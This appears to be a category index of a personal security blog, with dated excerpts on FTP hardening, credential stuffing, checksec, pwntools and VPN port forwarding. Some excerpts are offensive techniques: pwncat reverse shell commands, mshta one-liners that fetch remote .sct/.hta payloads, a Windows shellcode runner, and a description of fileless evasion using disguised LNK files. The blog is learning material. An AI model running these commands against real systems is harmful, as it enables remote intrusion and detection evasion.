  • Tried. Failed. Logged.

🔒 Information Security (122)

Reversing - Converting source code to assembly code online (godbolt.org) https://godbolt.org/ Compiler Explorer godbolt.org Reference: https://www.youtube.com/watch?v=gPsYkV7-yJk 2023. 4. 17.
Network Security - FTP access control configuration (/etc/ftpusers)
FTP is weak from a security standpoint and is exposed to Bounce Attack, Anonymous FTP attacks and the like, so important accounts such as root and daemon need to be restricted from logging in directly over FTP by listing them in /etc/ftpusers.
/etc/ftpusers
    # /etc/ftpusers: list of users disallowed FTP access. See ftpusers(5).
    root
    daemon
    bin
    sys
    sync
    games
    man
    lp
    mail
    news
    uucp
    nobody
Write the names of the users whose access should be restricted into this configuration file.
2023. 4. 17.
Information Security - Credential stuffing
Credential stuffing is a method in which IDs and passwords previously leaked elsewhere are tried against multiple websites or apps and, when a login succeeds, personal information or data is exfiltrated. Credential stuffing occurs because users use the same credentials (especially passwords) across multiple sites. An attacker who has obtained accounts across multiple services and sites is able to commit a wide range of fraud-type crimes. The victim may be an individual, but may also be a company. https://m.boannews.com/html/detail.html?tab_type=1&idx=114255 [Card news] Is your personal information safe? 'Credential stuffing' Credential stuffing is, previously, elsewhere ..
2023. 4. 16.
Reversing - Checking the protection mechanisms set on a binary (checksec)
    checksec -f {file}
RELRO (RELocation Read-Only): whether writing is possible, given the read-only permission setting
Stack Canary: checks for a Return Address Overwrite. The stack canary detects a stack overflow by means of the canary value.
NX (No-eXecute): the most representative way to bypass NX is ROP (Return Oriented Programming). NX prevents shellcode from executing.
ASLR (Address Space Layout Randomization): randomizes the addresses of the data regions (stack, heap, libraries, etc.) on every execution
checksec for Windows https://github.com/Wenzel/che..
2023. 3. 26.
System Security - pwntools
pwntools is a Python library that helps with writing exploits for executables in a Linux environment. It can also be put to good use in CTFs.
pip install command
    python3 -m pip install --upgrade pwntools
Usage example
    >>> from pwn import *
    >>> conn = remote('ftp.ubuntu.com',21)
    >>> conn.recvline() # doctest: +ELLIPSIS
    b'220 ...'
    >>> conn.send(b'USER anonymous\r\n')
    >>> conn.recvuntil(b' ', drop=True)
    b'331'
    >>> conn.recvline()
    b'Please specify the password.\r\n'
    >>> conn.close()
nc(NetCat), ..
2023. 3. 25.
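Reversing - Running shellcode on Windows
C source
    #include <windows.h>   /* VirtualAlloc, MEM_COMMIT, PAGE_EXECUTE_READWRITE */
    #include <string.h>    /* memcpy */

    int main(void){
        /* placeholder bytes, as in the original post */
        char shellcode[] = {0x00,};
        /* allocate a readable, writable and executable region */
        void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(exec, shellcode, sizeof shellcode);
        /* call the copied bytes as a function */
        ((void(*)())exec)();
        return 0;
    }
2023. 3. 23.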
Network Security - Reaching a web server from outside with Mullvad VPN port forwarding
Mullvad VPN site: check my device under Account > Devices tab. Address: https://mullvad.net/ko/account/#/devices
Click "Add port" on my device.
Port forwarding setup: check the assigned port number. It has the form country-city-port number, and the number at the end is the port number assigned to me.
In the Mullvad VPN program, click the gear (Settings), then click "VPN settings".
Under the tunnel protocol item, select "OpenVPN".
Be sure to check that the location the VPN server is connected to matches the location set on the port forwarding page.
Checking port access on the Mullvad VPN site. Address: https://mullvad.net/ko/check
First check your own IPv4 address. Go into the "Port check" tab directly below and the po.. checked a moment ago ..
2023. 3. 19.
Network Hacking - pwncat reverse shell commands
pip install command
    pip install pwncat
Install command for the victim (client) to connect to the attacker (server)
    sudo pip install pwncat-cs
The above is the install command that lets the attacker use the python3 -m pwncat command
TCP Reverse shell (client)
    pwncat -e '/bin/bash' example.com 4444
    pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 10
Attempts to reconnect every 10 seconds
Opening the attacker's reverse shell server
    python3 -m pwncat -lp 4444
pwncat prompt commands / shortcuts
sessions: list the connected victims
sessions {ID}: the victi.. to interact with ..
2023. 3. 16.
Web Hacking - Reverse shell command collection site (revshells.com) https://www.revshells.com/ Online - Reverse Shell Generator Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs. www.revshells.com 2023. 3. 16.
Network Security - Searching for malicious incident cases by IP (criminalip.io) https://www.criminalip.io/ko Cybersecurity Search Engine | Criminal IP Criminal IP is a Cyber Threat Intelligence Search Engine and Attack Surface Management (ASM) platform to find everything in Cybersecurity with impressive amount data capacities, API speed, and price. www.criminalip.io 2023. 3. 12.
System Security - Windows MSHTA (Microsoft HTML Application) attack
command-line
    mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")"))
    mshta.exe http://127.0.0.1:4444/payload.hta
    mshta.exe \\127.0.0.1\folder\payload.hta
payload.hta (SCT payloads)
Result
HTA (HTML Application)
As can be seen, mshta.exe (Microsoft HTML Application), which is installed on Windows by default, has the ability to request external web pages just as a web browser does. The problem here is that, perhaps because the browser built into it is Internet Explorer based, ActiveXObject..
2023. 2. 7.
System Security - Evasion technique with no executable file (fileless attack)
The term "fileless" suggests that a threat, such as a backdoor that exists only in the computer's memory, is not delivered in a file. With fileless techniques, the attack goes undetected or is hard to trace. Basically, the malicious code does not exist on disk in the form of a file, so it never becomes a scan target. From 2016 onward, fileless attacks making use of PowerShell showed an upward trend.
Example 1) Running a PowerShell one-liner using an LNK file
The file on screen that looks like a document file named clickme is in fact an LNK file. Looking at the file's properties shows that it is registered to run PowerShell, and examining the file's contents closely in an editor shows that it is a PowerShell one-liner.
[Figure 7] LNK file that appears to be the clickme document
Example 2) PowerShell one .. using Excel ..
2023. 2. 7.